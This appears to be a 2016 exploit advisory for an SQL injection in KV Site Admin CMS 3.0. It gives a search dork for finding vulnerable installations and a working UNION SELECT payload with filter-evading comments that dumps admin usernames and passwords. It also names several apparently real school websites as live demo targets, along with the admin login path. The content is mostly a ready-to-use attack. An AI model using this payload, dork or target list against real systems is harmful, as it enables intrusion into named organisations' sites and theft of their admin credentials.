#####################
# Exploit Title : KV Site Admin CMS 3.0 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : e.World Technology Ltd. All rights reserved    "Admin Area - Version 3.0"
# Version: 3.0
# MyBlog: http://xbadgirl21.blogspot.com
# Tested on: [ BackBox]
# skype:xbadgirl21
# Video Proof : https://youtu.be/43TuHcB_Kec
# Date: 26/08/2016
#####################
# [+] DESCRIPTION :
#####################
# [+] an SQL injection been Detected in KV Site Admin CMS 3.0 after you add
['] to the
# [+] Vuln Target Parameter you will get error like :
# [+] You have an error in your SQL syntax; check the manual that
corresponds to your
# [+] MySQL server version for the right syntax to use near '\'' at line 1
#####################
# [+] Poc :
#####################
# [page_code_no] Get Parameter Vulnerable To SQLi
#---------------------
# http://www.site.com/index-h.php?page_code_no=[SQLi]
-----------------------
# http://www.kvrihandnagar.org/index-h.php?page_code_no=19'
# http://www.kvrihandnagar.org/index-h.php?page_code_no=-19 /*!12345union*/
select 1,2,/*!12345group_coNcat(username,0x3a,password)*/,4 from
01_admin_detail--
######################
# [+] Live Demo :
######################
+ http://www.kvmughalsarai.org/index-h.php?page_code_no=40'
+ http://www.kvsrovns.org/index-h.php?page_code_no=1'
######################
# Admin Panel : http://www.site.com/kv_admin/login.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################